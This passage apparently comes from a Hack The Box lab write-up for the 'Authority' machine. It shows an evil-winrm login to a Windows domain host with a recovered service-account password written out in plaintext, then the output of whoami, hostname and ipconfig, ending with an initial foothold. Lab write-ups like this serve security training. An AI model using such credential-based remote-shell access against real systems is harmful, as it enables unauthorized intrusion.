WinRm
Connecting to the target system using the validated domain credential
┌──(kali㉿kali)-[~/archive/htb/labs/authority]
└─$ evil-winrm -i $IP -u svc_ldap -p 'lDaP_1n_th3_cle4r!'
Evil-WinRM shell v3.4
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\svc_ldap\Documents> whoami
htb\svc_ldap
*evil-winrm* ps c:\Users\svc_ldap\Documents> hostname
authority
*evil-winrm* ps c:\Users\svc_ldap\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::210
ipv6 address. . . . . . . . . . . : dead:beef::1fff:856d:2473:8cb6
link-local ipv6 address . . . . . : fe80::7835:2a6c:98a0:6a63%8
ipv4 address. . . . . . . . . . . : 10.10.11.222
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%8
10.10.10.2Initial Foothold established to the target system as the svc_ldap user